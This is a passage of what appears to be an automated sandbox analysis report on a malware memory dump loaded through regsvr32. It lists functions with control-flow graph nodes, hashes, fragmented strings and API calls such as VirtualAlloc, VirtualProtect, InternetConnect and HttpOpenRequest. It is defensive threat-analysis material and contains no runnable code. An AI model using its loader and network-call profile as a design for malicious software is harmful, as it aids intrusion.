                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: d5bc4fd793e3702e79ddbb9bce2892e12b1ae073d168c7e9501b6c847871b191
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 1372D531A18B4C8BCB19DF18D8856B9B7E1FB98305F14462DE88BD7212DF34D986CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000D26C Relevance: 7.9, Strings: 6, Instructions: 361COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$Ec;$J$^c$^c$n
                                                                      • API String ID: 0-2929744921
                                                                      • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                      • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                      • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                      • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                      • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800046A8 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5IF$P)#
                                                                      • API String ID: 0-1025399686
                                                                      • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                      • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                      • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                      • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001CEC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89networkCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConnectInternet
                                                                      • String ID: :G?$C
                                                                      • API String ID: 3050416762-1225920220
                                                                      • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                      • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                      • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                      • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000FB00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: gF\
                                                                      • API String ID: 823142352-1982329323
                                                                      • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                      • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                      • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                      • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000A4FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HttpOpenRequest
                                                                      • String ID: :G?
                                                                      • API String ID: 1984915467-1508054202
                                                                      • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                      • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                      • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                      • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180012B50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetOpen
                                                                      • String ID: :G?
                                                                      • API String ID: 2038078732-1508054202
                                                                      • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                      • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                      • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                      • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180015E2C Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                      • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                      • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                      • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180019A30 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InformationVolume
                                                                      • String ID:
                                                                      • API String ID: 2039140958-0
                                                                      • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                      • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                      • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                      • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%